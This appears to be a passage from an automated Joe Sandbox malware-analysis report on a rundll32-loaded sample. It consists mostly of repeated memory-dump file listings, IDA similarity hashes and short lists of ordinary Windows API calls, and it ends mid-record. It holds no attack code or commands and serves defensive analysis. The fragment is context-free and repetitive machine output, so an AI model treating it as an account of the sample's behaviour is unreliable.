                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 1269242970-0
                    • Opcode ID: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                    • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                    • Opcode Fuzzy Hash: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                    • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID:
                    • API String ID: 1799206407-0
                    • Opcode ID: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                    • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                    • Opcode Fuzzy Hash: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                    • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32 ref: 005115CB
                      • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                    • GetLastError.KERNEL32 ref: 00511666
                      • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                      • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                    • String ID: XLM$5B
                    • API String ID: 3390516113-4037079664
                    • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                    • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetThreadUILanguage.KERNEL32 ref: 004145B9
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$LanguagesPreferred$Language
                    • String ID:
                    • API String ID: 2255706666-0
                    • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                    • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                    • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                    • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • GetVolumeInformationW.KERNEL32 ref: 0043657C
                    • GetDriveTypeW.KERNEL32 ref: 004365D7
                      • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesFile$DriveInformationTypeVolume
                    • String ID: 8dC
                    • API String ID: 2660071179-998101939
                    • Opcode ID: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                    • Instruction ID: 486f2d80f4d3eed2484e1266edd3e8425bc97c3940d013daab9ec3d1af7560df
                    • Opcode Fuzzy Hash: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                    • Instruction Fuzzy Hash: 2F519F72205A81DDDB20DF36D8923E92B65F74578CF549026EE8987B5ACF3EC248C358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Info
                    • String ID: p.B
                    • API String ID: 1807457897-946182354
                    • Opcode ID: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                    • Instruction ID: a55d62deaf6486fe7fa7546ebbf7f25a2866b087c327a76bd6636ebfb1b793b4
                    • Opcode Fuzzy Hash: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
